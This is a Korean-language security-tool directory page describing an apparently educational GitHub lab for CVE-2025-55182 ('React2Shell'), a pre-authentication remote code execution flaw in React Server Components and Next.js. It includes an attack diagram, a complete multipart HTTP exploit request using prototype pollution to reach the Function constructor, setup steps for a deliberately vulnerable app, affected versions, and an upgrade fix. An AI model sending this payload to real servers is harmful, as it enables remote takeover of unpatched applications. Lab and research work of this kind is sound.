Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
react-rce — CVE-2025-55182 취약점에 대한 샘플을 AI와 함께 작성 및 테스트 했습니다. | Kitploit
도구/GitHubGitHub/randarts/react-rce
Exploit FrameworksVulnerability AnalysisWeb Application ExploitationLearning & EducationPayload DevelopmentLabs & Practice
GitHubrandarts/react-rce

react-rce

CVE-2025-55182 취약점에 대한 샘플을 AI와 함께 작성 및 테스트 했습니다.

저장소 보기
8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 React2Shell 취약점 실습

사용된 AI : Claude Opus 4.5 ⚠️ 경고: 이 환경은 교육 및 연구 목적으로만 사용하세요.

취약점 개요

항목내용
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
이름React2Shell
CVSS10.0 (Critical)
유형Pre-Auth Remote Code Execution
원인Flight 프로토콜 역직렬화 시 프로토타입 오염

공격 원리

root@kitploit:~
                    ┌─────────────────────────┐
                    │     Attacker            │
                    └───────────┬─────────────┘
                                │
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action 헤더 → Server Action 트리거                  │
│  2. multipart 페이로드 → Flight 프로토콜 역직렬화                │
│  3. Fake Chunk 객체의 then() 메서드 호출                       │
│  4. __proto__ 참조 → 프로토타입 오염                           │
│  5. Function 생성자 주입 → RCE                               │
└───────────────────────────────────────────────────────────┘

익스플로잇 페이로드 구조

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

핵심 요소:

  • Next-Action 헤더로 Server Action 트리거
  • Field 0: Fake Chunk with then method for promise-like behavior
  • Field 1: $@0 참조로 프로토타입 체인 순회
  • __proto__:then을 통해 Function 생성자 접근

빠른 시작

root@kitploit:~
cd vulnerable-app

# 의존성 설치
npm install

# 개발 서버 시작
npm run dev

http://localhost:3000 에서 접속


디렉토리 구조

root@kitploit:~
react-rce/
├── README.md
├── vulnerable-app/          # 취약한 Next.js 앱
│   ├── package.json         # Next.js 15.0.3 (취약 버전)
│   └── app/
│       ├── page.js          # UI (CVE 정보 + RCE 시연)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # 공격 도구 (선택)
    └── exploit.py           # CVE-2025-55182 PoC

영향 받는 버전

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router 사용 시)
  • 패키지: react-server-dom-webpack, react-server-dom-turbopack

방어 방법

root@kitploit:~
# 패치 버전으로 업그레이드
npm install [email protected] [email protected] [email protected]

참고

  • Next.js 보안 공지
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
도구 다운로드